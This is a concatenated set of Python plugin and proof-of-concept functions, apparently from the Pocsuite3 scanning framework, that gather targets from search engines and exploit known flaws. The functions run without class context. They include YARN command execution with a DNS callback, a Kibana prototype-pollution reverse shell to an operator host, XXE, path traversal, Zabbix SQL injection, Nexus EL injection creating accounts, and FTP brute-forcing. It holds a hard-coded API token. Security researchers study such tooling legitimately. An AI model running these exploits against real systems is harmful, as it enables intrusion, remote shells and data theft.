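    def init(self):
        """Seed the target list from one or more CIDR ranges.

        Source precedence: the ``CIDR`` environment variable, then every
        entry of ``conf.url`` (cleared afterwards so the ranges are not also
        treated as plain URLs), else an interactive prompt. Ranges that
        ``ip_network`` rejects are logged and skipped; every usable host of
        an accepted range is passed to ``add_target``.
        """
        logger.info("[PLUGIN] try fetch targets from CIDR...")

        cidr_set = set()
        if "CIDR" in os.environ:
            cidr_set.add(os.environ.get("CIDR"))
        elif conf.url:
            cidr_set.update(conf.url)
            conf.url = []
        else:
            cidr_set.add(input("Please input CIDR address:"))

        count = 0
        for cidr in cidr_set:
            # Trailing whitespace/newlines from the environment or the prompt
            # make ip_network() raise, so normalise before parsing.
            cidr = cidr.strip()
            try:
                network = ip_network(cidr, strict=False)
            except ValueError:
                logger.error("[PLUGIN] error format from " + cidr)
                continue
            # NOTE(review): on older interpreters hosts() yields nothing for a
            # /32 or /128, so a single-host "CIDR" adds no target — confirm
            # against the Python versions this is expected to run on.
            for host in network.hosts():
                self.add_target(host.exploded)
                count += 1

        logger.info("[PLUGIN] get {0} target(s) from CIDR".format(count))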
    def init(self):
        """Pull targets from ZoomEye for the configured dork.

        ``conf.dork_zoomeye`` wins over the generic ``conf.dork``; with
        neither set a PocsuitePluginDorkException is raised. Each hit is
        offered to ``add_target`` and the number it accepted is logged.
        """
        self.init_zoomeye_api()
        dork = conf.dork_zoomeye or conf.dork
        if not dork:
            raise PocsuitePluginDorkException(
                "Need to set up dork (please --dork or --dork-zoomeye)")

        logger.info(
            "[PLUGIN] try fetch targets from zoomeye with dork: {0}".format(dork))
        hits = self.zoomeye.search(dork, conf.max_page, resource=conf.search_type)
        # add_target() reports whether the entry was actually accepted.
        accepted = sum(1 for hit in hits if self.add_target(hit)) if hits else 0
        logger.info("[PLUGIN] get {0} target(s) from zoomeye".format(accepted))
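 def _verify(self):
     """Check for unauthenticated command execution via the YARN REST API.

     Requests a new application id, submits an application whose container
     command pings a unique DNS name under a CEYE collector, then asks the
     collector whether that name was resolved. A hit means the command ran
     on the target. Any exception is logged at info level and yields no
     result.
     """
     result = {}
     payload = random_str(16) + '.6eb4yw.ceye.io'
     cmd = 'ping ' + payload
     try:
         base = self.url if self.url.endswith('/') else self.url + '/'
         url1 = base + 'ws/v1/cluster/apps/new-application'
         url2 = base + 'ws/v1/cluster/apps'
         resp = requests.post(url=url1, timeout=10)
         app_id = resp.json()['application-id']
         data = {
             'application-id': app_id,
             'application-name': 'get-shell',
             'am-container-spec': {
                 'commands': {
                     'command': '%s' % cmd,
                 },
             },
             'application-type': 'YARN',
         }
         requests.post(url=url2, json=data, timeout=10)
         # NOTE(review): the CEYE API token and domain are hard-coded in
         # source; they belong in configuration, not in a shipped PoC.
         res = requests.get(
             'http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns',
             timeout=10)
         # The original tested ``payload in res`` against the Response object,
         # which iterates bytes chunks and can never match a str; the DNS
         # records are in the body text.
         if payload in res.text:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = self.url
             result['VerifyInfo']['Payload'] = payload
     except Exception as e:
         logger.info(e)
     return self.parse_output(result)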
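    def init(self):
        """Pull targets from FOFA (crawler) for the configured dork.

        ``conf.dork_fofac`` wins over ``conf.dork``; with neither set a
        PocsuitePluginDorkException is raised. Every hit is also fed to
        ``kb.comparison`` when that collector is enabled, then offered to
        ``add_target``.
        """
        self.init_fofa_crawler()
        dork = conf.dork_fofac or conf.dork
        if not dork:
            raise PocsuitePluginDorkException(
                "Need to set up dork (please --dork or --dork-fofac)")
        if kb.comparison:
            kb.comparison.add_dork("Fofac", dork)
        logger.info(
            "[PLUGIN] try fetch targets from fofa with dork: {0}".format(dork))

        targets = self.fofac.search(dork)
        count = 0
        for target in targets or ():
            if kb.comparison:
                kb.comparison.add_ip(target, "Fofa")
            if self.add_target(target):
                count += 1

        # Log the tally unconditionally (as the shodan/censys plugins do) so an
        # empty search is still visible instead of producing no line at all.
        logger.info("[PLUGIN] get {0} target(s) from FOfac".format(count))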
 def _attack(self):
     """Download an arbitrary file through the traversal-prone download endpoint.

     The file comes from the ``filename`` option (default
     ``App\\Common\\Conf\\db.php``) and the request carries the
     ``PHPSESSID`` option as the session cookie. A 200 whose body lacks the
     "does not exist" marker is treated as a successful read and the body
     is returned as ``File_Content``. Exceptions are logged as warnings.
     """
     result = {}
     try:
         missing_marker = "This file does not exist in JobManager log dir"
         wanted = self.get_option("filename")
         # NOTE(review): a user-supplied path gets '/' turned into two
         # backslashes while the default uses single ones — confirm which
         # encoding the target actually expects.
         if wanted:
             attack_filename = wanted.replace('/', '\\\\')
         else:
             attack_filename = 'App\\Common\\Conf\\db.php'
         logger.info("下载文件为:" + attack_filename)
         attack_payload = ('/xyhai.php?s=/Database/downFile/file/..\\..\\..\\'
                           + attack_filename + '/type/zip')
         attack_url = self.url + attack_payload
         logger.info(attack_url)
         cookies = {'PHPSESSID': self.get_option("PHPSESSID")}
         # verify=False: PoC targets commonly sit behind self-signed certs.
         attack_res = requests.get(attack_url, cookies=cookies, verify=False)
         if attack_res.status_code == 200:
             body = attack_res.content.decode()
             if missing_marker not in body:
                 result['VerifyInfo'] = {
                     'URL': attack_url,
                     'Payload': attack_payload,
                     'File_Content': '\n' + body,
                 }
     except Exception as e:
         logger.warn(str(e))
     return self.parse_output(result)
 def _verify(self):
     """Probe for blind XXE via a parameter entity that fetches a CEYE URL.

     A DTD declaring an external parameter entity pointing at
     ``http://<ceye subdomain>/<random>`` is POSTed as a SOAP body; the
     CEYE record for that random path is then checked to see whether the
     target fetched it. The HTTP reply itself is not inspected — the signal
     is out-of-band. Exceptions are logged as warnings.
     """
     result = {}
     ceye = CEye(token=self.token)
     ceye_subdomain = ceye.getsubdomain()
     random_uri = random_str(16)
     logger.info("random_url为:%s" % random_uri)
     # ``%%`` survives %-formatting as a literal '%' (parameter-entity syntax).
     verify_payload = """<?xml version="1.0" encoding="utf-8"?>
                         <!DOCTYPE root [
                         <!ENTITY %% xxe SYSTEM "http://%s/%s">
                         %%xxe;
                         ]>""" % (ceye_subdomain, random_uri)
     logger.warn(verify_payload)
     veri_url = self.url
     logger.warn(veri_url)
     headers = {
         "Content-Type": "text/xml",
         "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
         "SOAPAction": "aaa",
     }
     try:
         requests.post(veri_url, data=verify_payload, headers=headers)
         if ceye.verify_request(random_uri):
             result['VerifyInfo'] = {'URL': veri_url, 'Payload': verify_payload}
     except Exception as e:
         logger.warn(str(e))
     return self.parse_output(result)
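	def init(self):
		"""Open the record file for this plugin and keep the handle on ``self.file``.

		The file is created exclusively (``x+``) so the existence check and
		the open are one atomic step instead of a check-then-open race; a
		pre-existing file still surfaces as the original Exception message.
		"""
		logger.debug("[PLUGIN] file_record plugin init...")
		logger.info("[PLUGIN] The data will be recorded in {}".format(self.filename))
		try:
			self.file = open(self.filename, 'x+')
		except FileExistsError:
			raise Exception("The {} has existed".format(self.filename)) from None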
    def init(self):
        """Pull targets from Shodan for the configured dork.

        ``conf.dork_shodan`` wins over ``conf.dork``; an empty dork raises
        PocsuitePluginDorkException. With ``conf.dork_b64`` the dork is
        base64-decoded first. Hits are mirrored into ``kb.comparison`` when
        that collector is active, then offered to ``add_target``.
        """
        self.init_shodan_api()
        dork = conf.dork_shodan or conf.dork
        if not dork:
            raise PocsuitePluginDorkException(
                "Need to set up dork (please --dork or --dork-shodan)")
        if conf.dork_b64:
            import base64
            dork = base64.b64decode(dork).decode("utf-8")

        if kb.comparison:
            kb.comparison.add_dork("Shodan", dork)
        logger.info("[PLUGIN] try fetch targets from shodan with dork: {0}".format(dork))

        hits = self.shodan.search(dork, conf.max_page, resource=conf.search_type)
        count = 0
        for hit in hits or ():
            if kb.comparison:
                kb.comparison.add_ip(hit, "Shodan")
            if self.add_target(hit):
                count += 1

        logger.info("[PLUGIN] get {0} target(s) from shodan".format(count))
    def init(self):
        """Pull targets from Censys for the configured dork.

        ``conf.dork_censys`` wins over ``conf.dork``; an empty dork raises
        PocsuitePluginDorkException. With ``conf.dork_b64`` the dork is
        base64-decoded first. ``conf.search_type == "web"`` selects the
        ``websites`` index, anything else ``ipv4``. Hits are mirrored into
        ``kb.comparison`` when that collector is active.
        """
        self.init_censys_api()
        dork = conf.dork_censys or conf.dork
        if not dork:
            raise PocsuitePluginDorkException(
                "Need to set up dork (please --dork or --dork-censys)")
        if conf.dork_b64:
            import base64
            dork = base64.b64decode(dork).decode("utf-8")
        if kb.comparison:
            kb.comparison.add_dork("Censys", dork)
        logger.info("[PLUGIN] try fetch targets from censys with dork: {0}".format(dork))

        resource = "websites" if conf.search_type == "web" else "ipv4"
        hits = self.censys.search(dork, conf.max_page, resource=resource)
        count = 0
        for hit in hits or ():
            if kb.comparison:
                kb.comparison.add_ip(hit, "Censys")
            if self.add_target(hit):
                count += 1

        logger.info("[PLUGIN] get {0} target(s) from Censys".format(count))
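    def init(self):
        """Pull targets from Google for the configured dork.

        Each hit is reduced to ``scheme://netloc``, results pointing back at
        ``https://www.google.com`` are dropped, and duplicates are collapsed
        before being offered to ``add_target``. ``conf.dork_google`` wins
        over ``conf.dork``; with neither set a PocsuitePluginDorkException
        is raised.
        """
        self.google = Google()
        dork = conf.dork_google or conf.dork
        if not dork:
            raise PocsuitePluginDorkException(
                "Need to set up dork (please --dork or --dork-google)")
        if kb.comparison:
            kb.comparison.add_dork("Google", dork)
        logger.info(
            "[PLUGIN] try fetch targets from google with dork: {0}".format(dork))

        hits = self.google.search(dork)
        count = 0
        if hits:
            origins = set()
            for hit in hits:
                parsed = urlparse(hit)
                origin = parsed.scheme + "://" + parsed.netloc
                if origin != 'https://www.google.com':
                    origins.add(origin)
            for target in origins:
                if kb.comparison:
                    kb.comparison.add_ip(target, "Google")
                if self.add_target(target):
                    count += 1

        # Always report the tally, as the shodan/censys plugins do, so a
        # search with no usable hits is still visible in the log.
        logger.info("[PLUGIN] get {0} target(s) from google".format(count))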
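def task_thread():
    """Worker: drain ``task_queue`` trying FTP logins until one succeeds.

    Each item is ``(host, port, username, password)``. On the first
    successful login the remaining queue is cleared so sibling workers stop,
    and the credential pair is pushed to ``result_queue``.
    """
    import queue

    while True:
        # get_nowait() instead of empty()+get(): with several workers the
        # queue can drain between the two calls, and a blocking get() would
        # then hang this thread forever.
        try:
            host, port, username, password = task_queue.get_nowait()
        except queue.Empty:
            return
        # NOTE(review): this writes the candidate password to the log in
        # clear text.
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, username, password))
        if ftp_login(host, port, username, password):
            with task_queue.mutex:
                task_queue.queue.clear()
            result_queue.put((username, password))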
 def test_EL(self, p_resp):
     d = p_resp.json()
     result = d[0]['message']
     logger.info(result)
     try:
         if str(self.ran_sum) in result:
             return True
     except Exception:
         return False            
 def test_EL(self, p_resp):
     d = p_resp.json()
     result = d['result']['errors']['roles']
     logger.info(result)
     try:
         if str(self.ran_sum) in result:
             return True
     except Exception:
         return False            
    def _verify(self):
        """Probe for server-side EL evaluation via the user-create RPC.

        Sends an ExtDirect ``coreui_User.create`` call whose ``roles`` entry
        is an expression multiplying ``self.ran1`` by ``self.ran2``; if the
        evaluated product shows up in the reply (see ``test_EL``) the target
        is reported. Each header set from ``get_auth_headers()`` is tried in
        turn; a non-JSON reply (e.g. 401) moves on to the next one, any other
        error is logged and re-raised.

        NOTE(review): this is a *verify* step that attempts to create a user
        named ``shadowsock5`` on the target — a persistent side effect if the
        call is accepted.
        """
        result={}

        vul_url = self.url

        target_url = vul_url + "/service/extdirect"

        j = {
                "action":"coreui_User",
                "method":"create",
                "data": [
                    {
                        "userId": "shadowsock5",
                        "firstName": "77",
                        "lastName": "ss",
                        "password": "******",
                        "email": "*****@*****.**",
                        "status": "active",
                        "roles": [
                            "$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
                        ]
                    }
                ],
            "type":"rpc","tid":4}

        resp = None    # last HTTP response (None until the first request)


        l_auth_headers = self.get_auth_headers()

        for auth_header in l_auth_headers:
            # merge this candidate's auth header into the request headers
            self.headers.update(auth_header)
            # refresh the CSRF token headers
            self.headers.update(self.h)

            try:
                # send the payload request
                resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'})

                if self.test_EL(resp):   # did the EL expression get evaluated in the JSON reply?
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target_url
                    return self.save_output(result)
                # NOTE(review): this return fires on the first JSON reply, so
                # only one credential set is ever tried unless the server
                # answers with non-JSON (the 401 path below).
                return self.save_output(result)
            except json.decoder.JSONDecodeError as e:
                if resp.status_code == 401:
                    pass
                    #print("authentication failed")
                else:
                    logger.info("json解析失败")
                # failure may just be a wrong password: try the next one
                continue
            except Exception as e:
                logger.error(e)
                raise e
 def init_zoomeye_api(self):
     """Create the ZoomEye client from ``conf.login_user``/``conf.login_pass``.

     Logs the remaining search quota on success. A failed login is only
     logged as an error — the client object is still stored on
     ``self.zoomeye`` and nothing is raised.
     """
     self.zoomeye = ZoomEye(username=conf.login_user, password=conf.login_pass)
     if not self.zoomeye.get_resource_info():
         logger.error("[PLUGIN] ZoomEye login faild")
         return
     logger.info("[PLUGIN] ZoomEeye search limit {0}".format(self.zoomeye.resources))
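    def _verify(self):
        """Check Kibana's Timelion endpoint for prototype-pollution RCE.

        Fetches ``/app/kibana`` to learn the ``kbn-version`` header (sent
        back on the API call), then posts a Timelion sheet that pollutes
        ``__proto__.env`` so the next child process loads a reverse shell to
        ``ncip:ncport``. A 200 whose body contains ``invokeTime`` is reported
        as vulnerable.

        NOTE(review): despite being the *verify* step this fires a live
        reverse-shell payload; the caller must own ``ncip``/``ncport``.
        """
        result = {}
        kibana_path = self.url + "/app/kibana"
        timelion_run = self.url + "/api/timelion/run"
        payload = {
            "sheet": [
                ".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"bash -i >& "
                "/dev/tcp/" + self.get_option("ncip") + "/" +
                self.get_option("ncport") +
                " 0>&1\");process.exit()//')\n.props("
                "label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"
            ],
            "time": {
                "from": "now-15m",
                "to": "now",
                "mode": "quick",
                "interval": "auto",
                "timezone": "Asia/Shanghai"
            }
        }
        resp = requests.get(kibana_path, verify=False, timeout=20)
        kbn_version = ''
        try:
            kbn_version = resp.headers['kbn-version']
        except KeyError as e:
            # Header absent: still send the request with an empty value so
            # the shape of the call does not change.
            logger.info(e)

        header = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
            'Accept': 'application/json, text/plain, */*',
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            'Connection': 'close',
            'kbn-version': kbn_version,
            'Content-Type': 'application/json;charset=UTF-8'
        }

        # Stray ``print(path1)`` debug output and the unused ``output``/``path1``
        # locals from the original are gone; nothing else changed here.
        respose2 = requests.post(timelion_run,
                                 headers=header,
                                 data=json.dumps(payload),
                                 verify=False,
                                 timeout=30)
        if respose2.status_code == 200 and 'invokeTime' in respose2.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Referer'] = ""
        return self.parse_output(result)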
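 def _verify(self):
     """Report the target as vulnerable when ``self.check(ip, port)`` succeeds.

     The host is whatever follows ``//`` in ``self.url`` (a path or ``:port``
     suffix is passed through unchanged) and the port comes from the
     ``port`` option, defaulting to 1099 when it is unset or 0. Any exception
     is logged at info level and yields no result.
     """
     result = {}
     try:
         ip = self.url.split('//')[1]
         # ``int(opt) or 1099`` raised TypeError when the option was unset,
         # so the default never applied; coerce before converting.
         port = int(self.get_option('port') or 0) or 1099
         if self.check(ip, port):
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = ip
             result['VerifyInfo']['Info'] = 'the target exist vulnerability'
     except Exception as e:
         logger.info(e)
     return self.parse_output(result)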
    def _verify(self):
        """Probe for server-side EL evaluation via the Go group-repository API.

        POSTs a ``go/group`` repository definition whose ``memberNames`` entry
        is an expression multiplying ``self.ran1`` by ``self.ran2``; if the
        evaluated product appears in the reply (see ``test_EL``) the target is
        reported together with the auth header that worked (so credentials
        end up in the result). Header sets from ``get_auth_headers()`` are
        tried in turn; a non-JSON reply (e.g. 401) moves on to the next one,
        any other error is logged and re-raised.

        NOTE(review): this *verify* step tries to create a repository named
        ``internal`` on the target — a persistent side effect if accepted.
        """
        result={}

        vul_url = self.url

        target_url = vul_url + "/service/rest/beta/repositories/go/group"

        j = {
                "name": "internal",
                "online": "true",
                "storage": {
                    "blobStoreName": "default",
                    "strictContentTypeValidation": "true"
                },
                "group": {
                    "memberNames": [
                        "$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
                    ]
                }
            }

        resp = None    # last HTTP response (None until the first request)


        l_auth_headers = self.get_auth_headers()

        for auth_header in l_auth_headers:
            # merge this candidate's auth header into the request headers
            self.headers.update(auth_header)
            # refresh the CSRF token headers
            self.headers.update(self.h)

            try:
                # send the payload request
                resp = req.post(target_url, json=j, headers=self.headers)#, proxies={'http': 'http://127.0.0.1:8087'})

                if self.test_EL(resp):   # did the EL expression get evaluated in the JSON reply?
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target_url
                    result['VerifyInfo']['Credentials'] = auth_header
                    return self.save_output(result)
                # NOTE(review): returns on the first JSON reply, so only one
                # credential set is tried unless the server answers non-JSON.
                return self.save_output(result)
            except json.decoder.JSONDecodeError as e:
                if resp.status_code == 401:
                    pass
                    #print("authentication failed")
                else:
                    logger.info("json解析失败")
                # failure may just be a wrong password: try the next one
                continue
            except Exception as e:
                logger.error(e)
                raise e
 def _verify(self):
     """Run the Heartbleed probe against the host part of ``self.url`` on 443.

     ``check_heardbeat`` receives the host as bytes. The port is fixed at
     443 while the host string keeps any ``:port`` suffix from the URL —
     NOTE(review): confirm ``check_heardbeat`` tolerates that combination.
     Errors are logged at info level and produce no result.
     """
     result = {}
     try:
         host = self.url.split('//')[1]
         if self.check_heardbeat(host=host.encode(), port=443):
             result['VerifyInfo'] = {
                 'URL': host,
                 'INFO': 'target %s vulnerability' % host,
             }
     except Exception as e:
         logger.info(e)
     return self.parse_output(result)
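 def _verify(self):
     """Report the target when ``<url>/info`` answers 200 with a non-empty body.

     This is only a reachability check on the endpoint, not proof of an
     exposed-data condition: any 200 with content counts. Request errors
     are logged at info level and yield no result.
     """
     result = {}
     try:
         url = self.url + "/info"
         res = requests.get(url)
         if res.status_code == 200 and res.text:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = url
             result['VerifyInfo']['Payload'] = url
     except Exception as e:
         logger.info(e)
     # The original called ``self.parse_ouput`` (typo) here — outside the
     # try, so every run ended in AttributeError instead of a result.
     return self.parse_output(result)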
	def init(self):
		"""Load every ``*.py`` PoC found under ``paths.POCSUITE_POCS_PATH``.

		Files whose name starts with ``__`` are skipped. Each load attempt is
		logged as success or failure; a failure does not stop the walk.
		"""
		poc_files = [
			os.path.join(root, name)
			for root, _dirs, names in os.walk(paths.POCSUITE_POCS_PATH)
			for name in names
			if not name.startswith("__") and name.endswith(".py")
		]
		for poc_file in poc_files:
			if self.add_poc_from_file(poc_file):
				msg = "[PLUGIN] load PoC script '{0}' from seebug success"
			else:
				msg = "[PLUGIN] load PoC script '{0}' from seebug failed"
			logger.info(msg.format(poc_file))
 def _verify(self):
     """Check ``latest.php`` for the ``toggle_ids[]`` SQL injection.

     Appends a ``toggle_ids[]`` value that closes the original statement and
     selects from ``users``; a body that still mentions ``web.latest.toggle``
     is taken to mean the injected statement was accepted. ``self._get_url``
     supplies the base URL. Errors are logged at info level.
     """
     result = {}
     payload = 'latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1'
     try:
         response = requests.get(self._get_url + payload)
         if 'web.latest.toggle' in response.text:
             result['VerifyInfo'] = {'URL': self.url, 'Payload': payload}
     except Exception as e:
         logger.info(e)
     return self.parse_output(result)
 def _verify(self):
     """Check whether the Zabbix dashboard is reachable with ``self._headers``.

     Requests ``/zabbix/zabbix.php?action=dashboard.view&dashboardid=1``
     (the original spelled this path with hex escapes; the value is
     identical) and reports the target when the body contains
     ``Dashboard``. Errors are logged at info level.
     """
     result = {}
     payload = '/zabbix/zabbix.php?action=dashboard.view&dashboardid=1'
     try:
         response = requests.get(url=self._get_url + payload, headers=self._headers)
         if 'Dashboard' in response.text:
             result['VerifyInfo'] = {'URL': self.url, 'Payload': payload}
     except Exception as e:
         logger.info(e)
     return self.parse_output(result)
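    def _verify(self):
        """Check whether the vROps plugin upload endpoint is exposed.

        Resolves ``self.url`` to host/port, gives up early when the port is
        closed, then GETs ``/ui/vropspluginui/rest/services/uploadova``. A
        405 reply (route exists but refuses GET) is taken as the vulnerable
        signature. Every path now returns through ``save_output`` so the
        caller always receives a result object; the original returned bare
        ``None`` on a closed port.
        """
        result = {}

        vul_url = self.url

        host, port = url2ip(vul_url, True)

        logger.info("检查端口开放情况...")
        # A closed port means nothing else is worth trying.
        if not self.is_port_open(host, port):
            logger.info("端口不开放! 退出!")
            return self.save_output(result)

        logger.info("端口开放... 继续")

        target_url = "{0}/ui/vropspluginui/rest/services/uploadova".format(vul_url)

        try:
            resp = req.get(target_url, verify=False)
        except Exception as e:
            # Go through the framework logger instead of a bare print(),
            # then let the framework see the failure.
            logger.error(e)
            raise

        # NOTE(review): 405 only proves the route exists and rejects GET; it
        # is a weak fingerprint, not proof of an unauthenticated upload.
        if resp.status_code == 405:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)

        logger.info(resp)
        return self.save_output(result)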
    def _attack(self):
        """Trigger logback's ``JMXConfigurator.reloadByURL`` through Jolokia.

        The URL embedded in the payload is fixed to
        ``http://127.0.0.1:8080/logback.xml`` (``/`` is written as ``!/`` in
        the Jolokia path), so as written the target reloads a config from
        its own loopback rather than from a host the operator controls. Any
        200 reply is reported with the body as ShellInfo content.
        """
        result = {}
        payload = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/127.0.0.1:8080!/logback.xml"
        vul_url = self.url + payload
        logger.info("url: {}".format(vul_url))
        reply = requests.get(
            vul_url,
            headers={"Content-Type": "application/x-www-form-urlencoded"},
        )
        if reply.status_code == 200:
            result['ShellInfo'] = {'Content': reply.text}
        return self.parse_output(result)
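def ftp_burst(host, port):
    """Brute-force FTP on ``host:port``: anonymous login first, then the wordlist.

    Returns early when the port is closed. An accepted anonymous login is
    pushed to ``result_queue`` as ``('anonymous', '<empty>')`` and the
    wordlist is skipped; otherwise ``task_init`` fills the task queue and
    four ``task_thread`` workers run it. Failures in that phase are logged
    instead of being silently swallowed.
    """
    if not port_check(host, port):
        return

    if anonymous_login(host, port):
        logger.info('try burst {}:{} use username:{} password:{}'.format(
            host, port, 'anonymous', '<empty>'))
        result_queue.put(('anonymous', '<empty>'))
        return

    try:
        task_init(host, port)
        run_threads(4, task_thread)
    except Exception as e:
        # Best-effort by design, but a silent ``pass`` hid every failure
        # (including bugs in task_init); keep going, just say why.
        logger.error('burst {}:{} failed: {}'.format(host, port, e))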
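    def _verify(self):
        """Look for exposed ThinkPHP runtime log files.

        For ThinkPHP 3 and 5 the usual log directories are combined with the
        candidate file names from ``getTPLogFilename(version)``; the first URL
        that answers 200 with ``INFO`` in the body is reported via
        ``parse_attack``. Connection errors are logged and the scan moves on.
        Both versions shared a copy-pasted loop in the original; they now run
        through one loop over ``log_path_list``.
        """
        result = {}
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
        }
        # Insertion order matters: version 3 paths are probed before 5.
        log_path_list = {
            '3': ['/Runtime/Logs/', '/App/Runtime/Logs/', '/Application/Runtime/Logs/Admin/',
                '/Application/Runtime/Logs/Home/', '/Application/Runtime/Logs/'],
            '5': ['/runtime/log/'],
        }
        base = self.url.rstrip('/')

        for version, log_dirs in log_path_list.items():
            filename_list = self.getTPLogFilename(int(version))
            for temppath in log_dirs:
                for filename in filename_list:
                    vulurl = "{}{}".format(base, temppath + filename)
                    logger.info("Scan {}".format(vulurl))
                    try:
                        resp = requests.get(url=vulurl, headers=headers, timeout=3, verify=False)
                    except Exception:
                        logger.error("connect target '{} failed!'".format(vulurl))
                        continue
                    if "INFO" in resp.text and resp.status_code == 200:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['url'] = vulurl
                        return self.parse_attack(result)

        return self.parse_attack(result)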
 def _sql_inject(self, sql):
     """Run ``sql`` through the error-based injection in ``jsrpc.php``.

     The statement is URL-encoded into ``profileIdx2`` and the leaked value
     is pulled out of MySQL's ``Duplicate entry '~...~1'`` error text.
     Returns the first captured value, or False when nothing leaks or the
     request fails (the error is logged at info level).
     """
     encoded = parse.quote(sql)
     payload = ("jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2="
                + encoded
                + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1")
     separator = '' if self.url[-1] == '/' else '/'
     url = self.url + separator + payload
     leak = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
     try:
         response = requests.get(url, timeout=10)
         found = leak.findall(response.text)
         if found:
             return found[0]
     except Exception as e:
         logger.info(e)
     return False
 def _verify(self):
     """Check whether the WebLogic ``ws_utc`` settings endpoint is reachable.

     Requests ``ws_utc/resources/setting/options/general`` with
     ``self._headers``; anything other than a 404 is reported as vulnerable.

     NOTE(review): ``!= 404`` also accepts 401/403/5xx and redirects, so this
     fingerprint is prone to false positives — confirm whether a 200 with
     the settings page is the intended signature.
     """
     result = {}
     payload = 'ws_utc/resources/setting/options/general'
     try:
         separator = '' if self.url[-1] == '/' else '/'
         url = self.url + separator + payload
         response = requests.get(url=url, headers=self._headers)
         if response.status_code != 404:
             result['VerifyInfo'] = {'URL': self.url, 'Payload': payload}
     except Exception as e:
         logger.info(e)
     return self.parse_output(result)
    def init(self):
        """Seed targets from the ``pocsuite_target`` key of the configured Redis.

        Does nothing when ``get_redis()`` returns a falsy client.

        NOTE(review): ``r.get(key)`` returns a single value (bytes, or str
        with ``decode_responses``); iterating it yields ints or characters,
        not target strings — confirm the key type and whether a list/set
        read was intended.
        """
        client = self.get_redis()
        if not client:
            return
        key = 'pocsuite_target'
        logger.info("[PLUGIN] try fetch targets from redis...")

        stored = client.get(key)
        count = 0
        for target in stored or ():
            if self.add_target(target):
                count += 1

        logger.info("[PLUGIN] get {0} target(s) from redis".format(count))